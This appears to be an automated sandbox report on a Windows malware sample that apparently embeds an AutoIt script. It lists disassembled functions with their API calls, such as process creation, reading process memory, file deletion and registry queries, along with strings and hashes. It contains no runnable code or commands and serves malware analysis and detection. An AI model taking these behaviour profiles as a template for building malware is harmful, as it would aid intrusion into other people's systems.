Opcode Fuzzy Hash: a4e0a674aa071aea685500b297467e6db3d84bd0f95d442642e0158de8e9a1f2
Instruction Fuzzy Hash: B271AFB9921301CFC7A4EF7DE4956A93AE8BB58398B58412ED40AD7259EB304407CF64

Uniqueness

Uniqueness Score: -1.00%

Function 01322947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01322C05
DeleteFileW.KERNEL32(?), ref: 01322C87
CopyFileW.KERNEL32 ref: 01322C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01322CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01322CC0

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: b9abee688fd15bd906eec9e69700998e9f7426dd2ed3cbc18f6bbbfcab991573
Instruction ID: 755264d5ec2e416358dcb20ef1fe20008365021c2385543b6780659314cd7117
Opcode Fuzzy Hash: b9abee688fd15bd906eec9e69700998e9f7426dd2ed3cbc18f6bbbfcab991573
Instruction Fuzzy Hash: 6BB13F7191012EABDF25EFA4CC84EEFBB7DEF59354F1040A6F609A7140EA319A448F61

Uniqueness

Uniqueness Score: -1.00%

Function 012B3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32 ref: 012B3B40
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 012B3B61
RegCloseKey.ADVAPI32(00000000), ref: 012B3B83

Strings

Control Panel\Mouse, xrefs: 012B3B3E

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 0a85680ad36905f1e79a978ce4fa1d58a0a4a404da600a72fb79f7debda4e075
Instruction ID: d2705065a4a7f73cd71a318e1426fcba768c08ee017e102c4ea89493e7e42605
Opcode Fuzzy Hash: 0a85680ad36905f1e79a978ce4fa1d58a0a4a404da600a72fb79f7debda4e075
Instruction Fuzzy Hash: 07115AB5521208FFDB21CFA8DC85AEEBBBCFF01780B004559AA01D7114E631EA409760

Uniqueness

Uniqueness Score: -1.00%

Function 012BDFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 013032B7

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 80155c4495a1c0726d21ef04eece0b54438ebba1dc65824746c1579cac053580
Instruction ID: 325b52aeb4765ac5e7b37e02469b72e40e9c4610f0a4c80224b93519a7daadf8
Opcode Fuzzy Hash: 80155c4495a1c0726d21ef04eece0b54438ebba1dc65824746c1579cac053580
Instruction Fuzzy Hash: CEC29970A20206CFDB25CF58C8D1AEDBBF1BF08344F158569EA16AB391D375E981CB91

Uniqueness

Uniqueness Score: -1.00%

Function 012E3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,012B13C6,00000000,00000000,?,012E301A,012B13C6,00000000,00000000,00000000,?,012E328B,00000006,FlsSetValue), ref: 012E30A5
GetLastError.KERNEL32(?,012E301A,012B13C6,00000000,00000000,00000000,?,012E328B,00000006,FlsSetValue,01352290,FlsSetValue,00000000,00000364,?,012E2E46), ref: 012E30B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,012E301A,012B13C6,00000000,00000000,00000000,?,012E328B,00000006,FlsSetValue,01352290,FlsSetValue,00000000), ref: 012E30BF

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: b3d385ad097b46b7db931fbf20b8da96847fdf0dda8f5d5f5a0454cb1049ac87
Instruction ID: e1e9841c4ea9cd6a9a8f05fb399b4e738777f530358ea5b6ddc2a1f5b033720c
Opcode Fuzzy Hash: b3d385ad097b46b7db931fbf20b8da96847fdf0dda8f5d5f5a0454cb1049ac87
Instruction Fuzzy Hash: 36017136722222ABDB31CA69DC49A667FDCBF45B62B510620FA06E7144DB62D405C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 012CFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 012D0668

Part of subcall function 012D32A4: RaiseException.KERNEL32(?,?,?,012D068A,?,01381444,?,?,?,?,?,?,012D068A,012B1129,01378738,012B1129), ref: 012D3304

__CxxThrowException@8.LIBVCRUNTIME ref: 012D0685

Strings

Unknown exception, xrefs: 012D0692

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: e6ab674d963c662c1298bf77e5a2586268f59acb3d0c1bf2bf7fcd57616a1b9b
Instruction ID: 4e4222441d54025042f44768f1cb86902fceb7bc0ca4a40cde187e2639ec0069
Opcode Fuzzy Hash: e6ab674d963c662c1298bf77e5a2586268f59acb3d0c1bf2bf7fcd57616a1b9b
Instruction Fuzzy Hash: 3DF04634C2024FB7CB00FAB8E849CAE7B6C6E10110FA04175FB24C65A0EF71E615C5C5

Uniqueness

Uniqueness Score: -1.00%

Function 01323017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 0132302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 01323044

Strings

aut, xrefs: 01323038

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: eff43a9f85c1562c082599c09b63bb53ae3e7779754157b08f88fbc9758278d9
Instruction ID: 98341d150847c423717adaee17a7d23158552ed591526ec4f5e5e164d35a68bc
Opcode Fuzzy Hash: eff43a9f85c1562c082599c09b63bb53ae3e7779754157b08f88fbc9758278d9
Instruction Fuzzy Hash: CFD05EB650132867EF70A6A5AC0EFCB3A6CDB04754F0002A1B659D2085DFF4A984CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 001D1300 Relevance: 5.2, APIs: 3, Instructions: 720processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 001D1ABB
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 001D1B73

Memory Dump Source

Source File: 00000005.00000002.347993788.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_fredchungel99962.jbxd

Similarity

API ID: Process$CreateMemoryRead
String ID:
API String ID: 2726527582-0
Opcode ID: 3007ae169ef8b9d8c61beb8ea063371979b6b354134e23f449e077085ff78b4f
Instruction ID: f0c20b47d382598d7c78474c82be4c50cef3d8911180ef6720304ba17db4e010
Opcode Fuzzy Hash: 3007ae169ef8b9d8c61beb8ea063371979b6b354134e23f449e077085ff78b4f
Instruction Fuzzy Hash: 11620A30A14658EBEB24CFA4C840BDEB372EF58300F1095AAD50DEB390E7759E81CB59

Uniqueness

Uniqueness Score: -1.00%

Function 01337F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 013382F5
TerminateProcess.KERNEL32(00000000), ref: 013382FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 013384DD

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 8bcf047ef31ec70dbb0327063601aa774a7b110a41b7ccbe7eb6807807e75501
Instruction ID: e4c21686e148c4e766c8d34e261d90acdb5d394e63a998b861d32aa40b792109
Opcode Fuzzy Hash: 8bcf047ef31ec70dbb0327063601aa774a7b110a41b7ccbe7eb6807807e75501
Instruction Fuzzy Hash: 43126A71A083019FD724DF28C480B6ABBE5BFC4318F048A9DF9999B352D731E945CB96

Uniqueness

Uniqueness Score: -1.00%

Function 012E5AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6e17f0a5a87e3a822dd705377b1bbc3a3f50cc4813f47f564347132b2fd8a60
Instruction ID: 253e0a9ddd96bcf15e5a4fc3aaab709721bf8bd19808aa3bfb1b865c4dcffa68
Opcode Fuzzy Hash: b6e17f0a5a87e3a822dd705377b1bbc3a3f50cc4813f47f564347132b2fd8a60
Instruction Fuzzy Hash: 4B51B07993020A9FDF219FA8C94DFBEBFF8AF15318F84014AE605AB291D6719501CB61

Uniqueness

Uniqueness Score: -1.00%

Function 012B54C6 Relevance: 4.6, APIs: 3, Instructions: 103COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001), ref: 012B556D
SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 012B557D

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 2250ffc24bfcf24e6327ecaabf33e896311e1bde44c63ff81e26cfa630ec3200
Instruction ID: b833792ce89b1dbf1eb9d511a896407400134273d26d8c6a78ef85549045f890
Opcode Fuzzy Hash: 2250ffc24bfcf24e6327ecaabf33e896311e1bde44c63ff81e26cfa630ec3200
Instruction Fuzzy Hash: 79316F71A1020AEFDB14CF2CD880BD9BBB5FB44355F148229EA15DB240D771F994CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012E86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000), ref: 012E8704
GetLastError.KERNEL32(?,012E85CC,?,01378CC8,0000000C), ref: 012E870E
__dosmaperr.LIBCMT ref: 012E8739

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: eeb58af99517adada98d97c41ebc30a719b50631e0c034b2164b50eba7996e6b
Instruction ID: 43a417d48561cd1d2f10586843a735f144dc7bc585abc1b8833064f8ecbb86c3
Opcode Fuzzy Hash: eeb58af99517adada98d97c41ebc30a719b50631e0c034b2164b50eba7996e6b
Instruction Fuzzy Hash: 5A014E37A352211FD7756338A54C7BE6BC94B82738FA90119EB549B1D2DEA0C4C1C660

Uniqueness

Uniqueness Score: -1.00%

Function 01322FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 01322FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,01322CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 01323006
CloseHandle.KERNEL32(00000000), ref: 0132300D

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 2c2f726df1d1000e6699ff902e4b2fe8f6e0d6ae2860de44f0914ff05d718121
Instruction ID: 2291e3341d3e796b64155b7fa10de1168ff10e3b3825e2dba9212f819ea9a60c
Opcode Fuzzy Hash: 2c2f726df1d1000e6699ff902e4b2fe8f6e0d6ae2860de44f0914ff05d718121
Instruction Fuzzy Hash: 00E0863628122077E7302659BC0DF8B3E1CD78AF75F104210F759750C04AA4750143A8

Uniqueness

Uniqueness Score: -1.00%

Function 012C1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 012C17F6

Strings

CALL, xrefs: 012C17C6

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: fee4011cede6c46b2923c2340f396991d73e921129ca3413e9066aa9e7001ec7
Instruction ID: 1a86434f0f8792de78d0a812cc8c092d26e083d094c9ad39babdd0a61705c8f6
Opcode Fuzzy Hash: fee4011cede6c46b2923c2340f396991d73e921129ca3413e9066aa9e7001ec7
Instruction Fuzzy Hash: 7A22E0B0518302DFC715DF18C492B2ABBF1BF95704F18865DE6868B3A2D771E861CB82

Uniqueness

Uniqueness Score: -1.00%

Function 01326EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 01326F6B

Part of subcall function 012B4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,01381418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 012B4EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 01326F5A, 01326F63

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: 4a1ece3d075a46258d02c1cfa06f875941760fb674c34ada43d994b1f91d6799
Instruction ID: 1bc61689436d30f75c2204f89afcde2a3af22f2f00b759fb3945480cc41fb612
Opcode Fuzzy Hash: 4a1ece3d075a46258d02c1cfa06f875941760fb674c34ada43d994b1f91d6799
Instruction Fuzzy Hash: 5FB1A0711142129FCB14FF24C8D09BEB7E5BFA4344F04885DE996972A1EB30ED48CB92

Uniqueness

Uniqueness Score: -1.00%

Function 012EC827 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 012EC84C

Strings

, xrefs: 012EC891

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: e86300d1de6a78c8c15084c537d6c13cb360bb885d34a99a0ce28f1e497b9d8b
Instruction ID: 88748f663fe9779bbf09f528db67b88a3c93787b3781883a83ee8e16f74a7414
Opcode Fuzzy Hash: e86300d1de6a78c8c15084c537d6c13cb360bb885d34a99a0ce28f1e497b9d8b
Instruction Fuzzy Hash: 95415B715143889BDF26CEA8CC88BFABBEDEB55304F5404ECD68E87142D2359A55CF60

Uniqueness

Uniqueness Score: -1.00%

Function 012B2DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 012F2C8C

Part of subcall function 012B3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,012B3A97,?,?,012B2E7F,?,?,?,00000000), ref: 012B3AC2

Part of subcall function 012B2DA5: GetLongPathNameW.KERNELBASE ref: 012B2DC4

Strings

X, xrefs: 012F2C5A

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: cba6e3d352da7bb94b4f3e4af262542eb92f5da12c82788a58be4e63cc9b1604
Instruction ID: a6f4aec6fa53bff184976c6ea6bf74521db775d46d2229643b93c066bb96ebc4
Opcode Fuzzy Hash: cba6e3d352da7bb94b4f3e4af262542eb92f5da12c82788a58be4e63cc9b1604
Instruction Fuzzy Hash: 2D21D570A20259DFDB11EF94C855BEEBBFCAF59304F008059E505B7240DBB8A5498F61

Uniqueness

Uniqueness Score: -1.00%

Function 01322557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 01322587

Strings

EA06, xrefs: 013225B9

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: 1003d297b2f7ff57c4e28387081bd3aac8ad9428ccb0ddf3b254255b9718b7f6
Instruction ID: 40d35bb8b2ee0a3e0608ce21c53594ee346d2ab3309529c1e70dc2a531e27ef2
Opcode Fuzzy Hash: 1003d297b2f7ff57c4e28387081bd3aac8ad9428ccb0ddf3b254255b9718b7f6
Instruction Fuzzy Hash: 1401F9718042187EEF18D7A8CC56EFEBBF89B15205F00415AE153D6181E474E6088B60

Uniqueness

Uniqueness Score: -1.00%

Function 012E3467 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,00000001,?,?,?,?,?), ref: 012E34D8

Strings

LCMapStringEx, xrefs: 012E3478, 012E3482

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: f103c6b703e85f9d04f90643b6a1d17cc3a4afd0ff2b161282512edefa3cea01
Instruction ID: fff891172074613a85f344ba9189ecd8ca7f988e83390b9dc8292867c30303da
Opcode Fuzzy Hash: f103c6b703e85f9d04f90643b6a1d17cc3a4afd0ff2b161282512edefa3cea01
Instruction Fuzzy Hash: CD01133661020DBBCF129F91DD05EEE7FA6EF58750F454158FE0426120CA32D930EB85

Uniqueness

Uniqueness Score: -1.00%

Function 012E3162 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 012E31A1

Strings

FlsAlloc, xrefs: 012E3173, 012E317D

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
